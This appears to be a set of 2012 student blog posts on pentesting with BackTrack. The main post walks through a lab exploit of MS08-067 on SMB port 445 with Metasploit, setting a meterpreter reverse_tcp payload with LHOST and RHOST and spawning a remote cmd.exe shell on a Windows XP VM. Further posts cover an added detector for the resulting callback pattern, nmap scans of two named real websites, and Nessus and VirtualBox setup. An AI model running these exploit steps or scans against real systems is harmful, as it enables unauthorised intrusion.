Tuesday, 11 September 2012

How to exploit Port 445 SMB using Metasploit

In this post I will try to exploit port 445 (SMB) using Metasploit on BackTrack R2.
First we need information about the victim; in penetration testing this is known as information gathering. We can use nmap, Zenmap, etc. to scan candidate victims on the network.


Then we run a vulnerability assessment scan on the target IP 192.168.56.101; I use Nessus to do it.

In the scan above, we can see that the victim has 2 high-risk vulnerabilities. Click on port 445 to look at the detailed information, like this:


I looked at the 2 vulnerabilities in the scan above and chose the 2nd plugin, named MS08-067. I searched Google for information about that plugin's vulnerability, found it in the Metasploit payload description, and decided to try to exploit it. Next, open the Metasploit console with this command in a terminal: #msfconsole


Use the exploit that matches the Nessus result; the syntax in Metasploit is
use exploit/windows/smb/ms08_067_netapi


After choosing the exploit we need to set the payload with the syntax
set PAYLOAD windows/meterpreter/reverse_tcp
After setting the payload we need to set the local host and the target with the syntax
set LHOST 192.168.56.102 (my IP)
set RHOST 192.168.56.101 (target IP)
and run the exploit with the syntax
exploit
to enter meterpreter mode.


Once we are in meterpreter mode, it means we have opened a hole into the target system with the payload we used. Now we need to get to C:\ in system32 to fully take over the target system,
using the syntax

meterpreter > execute -f cmd.exe -M -i
This command makes the system (XP) run a command prompt, and after that we are in system32 on the target.


From the above we can see that the Windows XP SP3 machine in VirtualBox has been hacked, by getting into the Windows command prompt.
Furthermore, to prove that I have really got into the Windows system, I will create a new folder named "PANJI_IS2C".


Congrats, we have successfully exploited Windows using Metasploit...
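
For defenders, the sequence above leaves a recognisable network pattern: an inbound connection to port 445, followed shortly by the same host opening a connection back to the SMB client, which is how the reverse_tcp payload reaches LHOST. The following is an added example, not part of the original post, that correlates the two over constructed flow records; the record format, the 60-second window and the sample lines are assumptions (4444 is Metasploit's default LPORT, used here because the post sets none).

```python
from datetime import datetime, timedelta

# Constructed sample flow records (not real logs): time src sport dst dport
SAMPLE_FLOWS = """\
2012-09-11T10:00:00 192.168.56.102 40112 192.168.56.101 445
2012-09-11T10:00:03 192.168.56.101 1034 192.168.56.102 4444
2012-09-11T10:05:00 192.168.56.50 40200 192.168.56.101 445
2012-09-11T10:05:10 192.168.56.101 1040 192.168.56.20 80
2012-09-11T10:30:00 192.168.56.101 1050 192.168.56.50 8080
"""

WINDOW = timedelta(seconds=60)  # assumed correlation window
SMB_PORT = 445


def parse_flows(text):
    """Yield (timestamp, src, sport, dst, dport) tuples, skipping bad lines."""
    for line in text.splitlines():
        parts = line.split()
        if len(parts) != 5:
            continue
        try:
            ts = datetime.strptime(parts[0], "%Y-%m-%dT%H:%M:%S")
            yield ts, parts[1], int(parts[2]), parts[3], int(parts[4])
        except ValueError:
            continue


def find_callbacks(text, window=WINDOW):
    """Return alerts where a host that received SMB from S connects back to S."""
    recent_smb = {}  # (server, client) -> time of last inbound SMB connection
    alerts = []
    for ts, src, _sport, dst, dport in sorted(parse_flows(text)):
        if dport == SMB_PORT:
            recent_smb[(dst, src)] = ts
            continue
        seen = recent_smb.get((src, dst))
        if seen is not None and ts - seen <= window:
            alerts.append({"host": src, "peer": dst, "port": dport,
                           "delay_s": int((ts - seen).total_seconds())})
    return alerts


if __name__ == "__main__":
    for alert in find_callbacks(SAMPLE_FLOWS):
        print(alert)
```

On the sample data only the 10:00:03 connection is reported; the 10:30 connection to 192.168.56.50 falls outside the window and the connection to 192.168.56.20 has no preceding SMB session from that peer.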

Saturday, 08 September 2012

How to install Nessus in BackTrack 5 R2

In this post I would like to explain how to install Nessus in BackTrack. First, download Nessus from http://www.nessus.org/register/. After registering and downloading the application, we can install the package directly in the following manner:
Open a terminal and type the following command; do not forget to first change to the directory where we downloaded Nessus.


root@bt:~# dpkg -i Nessus-5.0.1-debian6_i386.deb
Selecting previously deselected package nessus.
(Reading database ... 252456 files and directories currently installed.)
Unpacking nessus (from Nessus-5.0.1-debian6_i386.deb) ...
Setting up nessus (5.0.1) ...

 - You can start nessusd by typing /etc/init.d/nessusd start
 - Then go to https://bt:8834/ to configure your scanner


Processing triggers for ureadahead ...



Information Gathering in www.spentera.com

In this post, I will discuss gathering information about the www.spentera.com site. I use two methods: active and passive.

The first, the active method, uses a tool called nmap.
Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.

From the above display, we can see which ports are open and which are closed: ports 80 and 8080 are open, and ports 443 and 8443 are closed.


In the above display, the verbosity level is increased and the port number and host are selected.


In the view below, the name of the device and the operating system appear.



From the above display, ScanPBNJ performs an Nmap scan and then stores the results in a database. ScanPBNJ stores information about the machine that has been scanned: the IP address, operating system, hostname and a localhost bit.

The second is the passive way, as follows:



As far as I know, Spentera is Security Consulting

The Information Security Consulting service was established to address the growing need for organizations to understand and manage security at a higher level and "talking techie" where appropriate.

Security Audit

Security audit helps clients evaluate their current security positions and implement suggested improvements before security gaps can become security breaches.

Penetration Testing

Spentera validates the control and implementation of existing security and risk measures by performing demonstrations of activities that are unknown in the networks, systems and attacks on application as part of a security testing in a safe and controlled manner.

Vulnerability Assessment

Spentera's Vulnerability Assessment Service can assist you in identifying the vulnerability of networks and information you have, by doing that, you can prevent attacks that may be made against such vulnerabilities.

Digital Forensics

Spentera digital forensics team perform the analysis based on various objectives, such as, discovery of perpetrator location, their identification and damaged instances which may involve different technologies like servers, laptops, portable media, mobile phones and backup devices.

Information Gathering in is2c-dojo.com

In this post, I will discuss gathering information about the http://is2c-dojo.com site. I use two methods: active and passive.

The first, the active method, uses a tool called nmap.
Nmap (“Network Mapper”) is an open source tool for network exploration and security auditing. It was designed to rapidly scan large networks, although it works fine against single hosts.



From the above display, we can see which ports are open and which are closed: ports 80 and 8080 are open, and ports 443 and 8443 are closed.


In the view below, the name of the device and the operating system appear.



The second is the passive way, as follows:


The display above shows that the site is2c-dojo.com is indexed and listed in Google. IS2C is a course that covers digital forensics and is managed by Mr. Mada & team.



On some other sites I also saw Mr. Mada's activity as a speaker at IT seminars, especially on digital forensics, and at the seminars given by Mr. Mada the IS2C courses were also publicized.


Thursday, 06 September 2012

How to install VirtualBox and an 'OS' in BackTrack R2

First, download and install VirtualBox. Using VirtualBox to practise pentesting with BackTrack 5 greatly helps us train our skills before pentesting in the real world. Therefore, we must first install VirtualBox on BackTrack. The problem is that if we install it directly with apt-get install virtualbox-4.0, VirtualBox will give an error when it runs. So go through the following steps.
The reason for the error when running VirtualBox is the kernel headers on BackTrack 5, so we must prepare them first. Type the following commands in the terminal:

  • root@bt:~# prepare-kernel-sources
  • root@bt:~# cd /usr/src/linux
  • root@bt:/usr/src/linux# cp -rf include/generated/* include/linux/ 
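Then edit the sources.list file and add the VirtualBox repository by typing the following command:
  • root@bt:/usr/src/linux# echo "deb http://download.virtualbox.org/virtualbox/debian lucid contrib" >> /etc/apt/sources.list
Then download the VirtualBox repository signing key and add it to apt by typing the following command. The key is fetched over plain HTTP here, so compare its fingerprint with the one Oracle publishes before trusting packages signed with it:
  • root@bt:/usr/src/linux# wget -q http://download.virtualbox.org/virtualbox/debian/oracle_vbox.asc -O- | sudo apt-key add -
Then update the package lists by typing the following commands: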
  • root@bt:/usr/src/linux# apt-get update
  • root@bt:/usr/src/linux# apt-cache search virtualbox 
Then install VirtualBox by typing the following command:
  • root@bt:/usr/src/linux# apt-get install virtualbox-4.2
     
Congratulations, VirtualBox is now installed.

Second, install an operating system in VirtualBox on BackTrack. In this example I use Windows XP SP3. Here's how to set it up:

Open VirtualBox:

 
Specify the name of the system to be installed, and click "next"




At this stage we need to set the amount of RAM the system will use, then click "next"
At this stage choose the default, "Create New Hard Disk"
Choose "VDI" as the hard disk type in VirtualBox
Choose the default, "Dynamically Allocated"
Set the size of the virtual hard disk; the amount depends on the requirements of the system to be installed
This is the final step in preparing the virtual disk for installing another system; in this case I install Windows XP SP3. This screenshot is from when I tried to install Windows in VirtualBox:
Press F8 when this dialog appears
Congrats, on this screen we have installed Windows XP SP3 in VirtualBox
After the Windows operating system is successfully installed, configure the network so that the Windows machine installed in VirtualBox can ping our laptop (my OS is Ubuntu), as in this picture:


Now we can connect from the VirtualBox machine to our laptop...